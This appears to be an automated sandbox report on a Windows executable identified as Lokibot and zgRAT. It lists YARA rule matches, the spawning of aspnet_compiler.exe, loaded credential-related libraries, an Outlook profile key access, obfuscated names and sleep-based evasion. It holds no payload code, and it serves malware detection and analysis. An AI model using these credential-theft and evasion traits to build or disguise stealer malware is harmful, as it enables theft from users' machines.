                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                      Source: Process Memory Space: 6SQADa3zKv.exe PID: 5948, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: Process Memory Space: aspnet_compiler.exe PID: 5748, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Code function: 0_2_00C87269
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Code function: 0_2_00C80B88
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Code function: 0_2_00C80B78
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Code function: 0_2_00C874B9
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Code function: 0_2_00C8747B
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Code function: 0_2_00C875BA
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Code function: 0_2_00C87685
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Code function: 0_2_00C87666
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 2_2_0040549C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 2_2_004029D4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: String function: 0041219C appears 45 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: String function: 00405B6F appears 42 times
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123737399.00000000027AA000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameResourceAssembly.dllD vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123151213.00000000009BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123697598.0000000002760000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameBATMAN.dll. vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe, 00000000.00000000.2119240963.0000000000440000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameOct21.exe, vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123823559.00000000027E1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBATMAN.dll. vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123958645.000000000388D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameResourceAssembly.dllD vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe | Binary or memory string: OriginalFilenameOct21.exe, vs 6SQADa3zKv.exe
                      Source: 6SQADa3zKv.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                      Source: 6SQADa3zKv.exe, type: SAMPLE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                      Source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                      Source: Process Memory Space: 6SQADa3zKv.exe PID: 5948, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: Process Memory Space: aspnet_compiler.exe PID: 5748, type: MEMORYSTR | Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                      Source: 6SQADa3zKv.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@5/3@1/1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Code function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6SQADa3zKv.exe.log
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Mutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Mutant created: NULL
                      Source: 6SQADa3zKv.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 6SQADa3zKv.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: 6SQADa3zKv.exe | ReversingLabs: Detection: 60%
                      Source: unknown | Process created: C:\Users\user\Desktop\6SQADa3zKv.exe "C:\Users\user\Desktop\6SQADa3zKv.exe"
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: vaultcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: netapi32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: samcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: samlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                      Source: 6SQADa3zKv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 6SQADa3zKv.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: 6SQADa3zKv.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: BATMAN.pdbxD source: 6SQADa3zKv.exe, 00000000.00000002.2123697598.0000000002760000.00000004.08000000.00040000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123823559.00000000027E1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2182297243.0000000000942000.00000002.00000001.01000000.00000008.sdmp
                      Source: Binary string: BATMAN.pdb source: 6SQADa3zKv.exe, 00000000.00000002.2123697598.0000000002760000.00000004.08000000.00040000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123823559.00000000027E1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Oct21.pdb source: 6SQADa3zKv.exe

                      Data Obfuscation

                      Source: 6SQADa3zKv.exe, nSeEfBPrNNOOsnl8nXl.cs - .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: Yara match - File source: 0.2.6SQADa3zKv.exe.384ab08.3.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match - File source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match - File source: Process Memory Space: 6SQADa3zKv.exe PID: 5948, type: MEMORYSTR
                      Source: Yara match - File source: Process Memory Space: aspnet_compiler.exe PID: 5748, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Code function: 0_2_00C82621 push cs; retf 0_2_00C82628
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Code function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Code function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
                      Source: 6SQADa3zKv.exe - Static PE information: section name: .text entropy: 7.412026734524428
                      Source: 6SQADa3zKv.exe, Form1.cs - High entropy of concatenated method names: 'Dispose', 'M7PQJd9CC', 'ai7SFRhA5', 'vdd5aFHpK', 'UXNfvJSBH', 'u3b4W1W6Y', 'HsF0U0uOO', 'FUdFnOTPU', 'x0MUu1hpn', 'MUwWETmYN'
                      Source: 6SQADa3zKv.exe, zTKw6eRApWlZpDn0Z2.cs - High entropy of concatenated method names: 'IfwPzm43eM', 'SK81H7I7Tj', 'rDp1PAFHor', 'DpE11IIQkK', 'jeu1sroaFR', 'vL41EEwEl7', 'FZ917wcOWi', 'J7N1bugLFy', 'YIQ1JsObJ5', 'ifr1wbAW4U'
                      Source: 6SQADa3zKv.exe, nSeEfBPrNNOOsnl8nXl.cs - High entropy of concatenated method names: 'BJLEdgYTt6', 'KDikMXewCI', 'ixhEn5ja52', 's35E6llx3b', 'V8tEmp0H02', 'RJGELNQQrs', 'XPonKhLtDXiD7', 'gIKs54yn1k', 'huIsf9RFTU', 'pAGs4gB0Qw'
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Process information set: NOGPFAULTERRORBOX
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory allocated: 990000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory allocated: 27E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Memory allocated: 47E0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe TID: 5052 - Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 2888 - Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,2_2_00403D74
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exe - Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - Thread delayed: delay time: 60000
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123958645.00000000039C4000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
                      Source: 6SQADa3zKv.exe, 00000000.00000002.2123958645.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, 6SQADa3zKv.exe, 00000000.00000002.2123958645.0000000003A55000.00000004.00000800.00020000.00000000.sdmp - Binary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
